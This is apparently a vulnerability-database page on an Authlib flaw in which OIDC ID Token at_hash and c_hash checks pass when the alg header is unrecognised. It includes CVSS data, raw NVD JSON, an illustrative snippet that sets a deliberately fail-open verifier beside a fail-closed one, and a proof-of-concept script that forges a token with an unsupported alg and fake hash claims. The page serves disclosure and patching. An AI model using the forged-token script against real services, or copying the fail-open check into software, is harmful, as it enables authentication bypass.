Security Vulnerability Report
CVE-2026-28498 CVSS 7.5 HIGH

CVE-2026-28498

Published: 2026-03-16 18:16:08
Last Modified: 2026-03-17 20:40:38

Description

Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a library-level vulnerability was identified in the Authlib Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (_verify_hash) responsible for validating the at_hash (Access Token Hash) and c_hash (Authorization Code Hash) claims exhibits a fail-open behavior when encountering an unsupported or unknown cryptographic algorithm. This flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized alg header parameter. The library intercepts the unsupported state and silently returns True (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications. This issue has been patched in version 1.6.9.
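The fail-open behaviour the description refers to, beside the fail-closed form a verifier should have, as an added illustration that is not Authlib's code: the alg-to-hash mapping follows OIDC Core 3.3.2.11 (at_hash/c_hash are the base64url-encoded left-most half of the token hashed with the ID Token's JWS hash function), the function names are hypothetical, and signature verification of the ID Token is assumed to have been done by the caller.

```python
# Added example, not Authlib's code: at_hash/c_hash checks, fail-open (the CVE-2026-28498 behaviour) vs fail-closed.
import base64
import hashlib
import hmac
import json

# Hash function implied by the ID Token's JWS alg (OIDC Core 3.3.2.11 / JWA).
ALG_HASH = {
    "HS256": "sha256", "RS256": "sha256", "ES256": "sha256", "PS256": "sha256",
    "HS384": "sha384", "RS384": "sha384", "ES384": "sha384", "PS384": "sha384",
    "HS512": "sha512", "RS512": "sha512", "ES512": "sha512", "PS512": "sha512",
}

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def compute_token_hash(value: str, alg: str) -> str:
    """at_hash / c_hash: base64url of the left-most half of hash(value)."""
    digest = hashlib.new(ALG_HASH[alg], value.encode("ascii")).digest()
    return b64url_encode(digest[: len(digest) // 2])

def verify_hash_fail_open(value, claim, alg):
    """Mirrors the pre-1.6.9 behaviour described above: unknown alg => True."""
    if alg not in ALG_HASH:
        return True  # the fail-open defect: an unverifiable claim is treated as verified
    return hmac.compare_digest(compute_token_hash(value, alg), claim)

def verify_hash_fail_closed(value, claim, alg):
    """Fixed form: an alg the verifier cannot hash with is an error, never a pass."""
    if alg not in ALG_HASH:
        raise ValueError(f"unsupported alg for hash verification: {alg!r}")
    return hmac.compare_digest(compute_token_hash(value, alg), claim)

def check_id_token_hashes(id_token, access_token=None, code=None):
    """Check at_hash / c_hash on an ID Token whose signature the caller has
    already verified (signature checking is out of scope here). Fails closed."""
    header_b64, payload_b64, _sig = id_token.split(".")
    alg = json.loads(b64url_decode(header_b64))["alg"]
    claims = json.loads(b64url_decode(payload_b64))
    for claim, value in (("at_hash", access_token), ("c_hash", code)):
        if value is None:
            continue
        if claim not in claims:
            raise ValueError(f"{claim} is required but absent")
        if not verify_hash_fail_closed(value, claims[claim], alg):
            return False
    return True
```

With an unknown alg the fail-open variant returns True for an arbitrary claim value, while the fail-closed variant raises; a verifier that cannot compute the hash has no basis to report a match.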

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:* - VULNERABLE
Authlib < 1.6.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-28498 Proof of Concept
Authlib OIDC ID Token Hash Verification Bypass

This PoC demonstrates the fail-open behavior in Authlib's _verify_hash function.
"""
import json
import base64
import time


def create_fake_id_token(payload, alg='none'):
    """
    Create a fake ID Token with unsupported alg to bypass hash verification.
    """
    # Token structure: header.payload.signature
    header = {
        'alg': alg,  # Use unsupported algorithm
        'typ': 'JWT'
    }

    # Add hash claims that won't be properly verified
    payload['at_hash'] = 'fake-access-token-hash'
    payload['c_hash'] = 'fake-auth-code-hash'

    # Base64url encode
    header_b64 = base64.urlsafe_b64encode(
        json.dumps(header).encode()
    ).rstrip(b'=').decode()
    payload_b64 = base64.urlsafe_b64encode(
        json.dumps(payload).encode()
    ).rstrip(b'=').decode()

    # Use empty signature for 'none' algorithm
    sig_b64 = '' if alg == 'none' else 'fake-signature'

    return f"{header_b64}.{payload_b64}.{sig_b64}"


def exploit():
    """
    Demonstrate the vulnerability.
    """
    # Standard valid payload structure
    payload = {
        'iss': 'https://auth.example.com',
        'sub': 'user123',
        'aud': 'client-id-12345',
        'exp': int(time.time()) + 3600,
        'iat': int(time.time())
    }

    # Create token with unsupported alg
    fake_token = create_fake_id_token(payload, alg='UNSUPPORTED_ALG')

    print(f"[+] Created fake ID Token: {fake_token[:50]}...")
    print("[+] Token contains unsupported alg: UNSUPPORTED_ALG")
    print("[+] at_hash and c_hash contain arbitrary values")
    print("[+] Authlib will fail-open and accept this token!")

    return fake_token


if __name__ == '__main__':
    exploit()

References

Patch: https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b
Release: https://github.com/authlib/authlib/releases/tag/v1.6.9

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28498", "sourceIdentifier": "[email protected]", "published": "2026-03-16T18:16:07.717", "lastModified": "2026-03-17T20:40:37.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a library-level vulnerability was identified in the Authlib Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (_verify_hash) responsible for validating the at_hash (Access Token Hash) and c_hash (Authorization Code Hash) claims exhibits a fail-open behavior when encountering an unsupported or unknown cryptographic algorithm. This flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized alg header parameter. The library intercepts the unsupported state and silently returns True (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications. This issue has been patched in version 1.6.9."}, {"lang": "es", "value": "Authlib es una biblioteca Python que construye servidores OAuth y OpenID Connect. Antes de la versión 1.6.9, se identificó una vulnerabilidad a nivel de biblioteca en la biblioteca Python Authlib con respecto a la validación de los tokens de ID de OpenID Connect (OIDC). Específicamente, la lógica interna de verificación de hash (_verify_hash) responsable de validar las reclamaciones at_hash (Hash de Token de Acceso) y c_hash (Hash de Código de Autorización) exhibe un comportamiento fail-open al encontrar un algoritmo criptográfico no compatible o desconocido. Esta falla permite a un atacante eludir las protecciones de integridad obligatorias al suministrar un token de ID falsificado con un parámetro de encabezado alg deliberadamente no reconocido. 
La biblioteca intercepta el estado no compatible y devuelve silenciosamente True (validación aprobada), violando inherentemente los principios fundamentales de diseño criptográfico y las especificaciones directas de OIDC. Este problema ha sido parcheado en la versión 1.6.9."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", 
"baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-354"}, {"lang": "en", "value": "CWE-573"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.9", "matchCriteriaId": "8C677FEC-2094-49D8-ABAB-F740B6F83D38"}]}]}], "references": [{"url": "https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/authlib/authlib/releases/tag/v1.6.9", "source": "[email protected]", "tags": ["Product", "Release Note ... (truncated)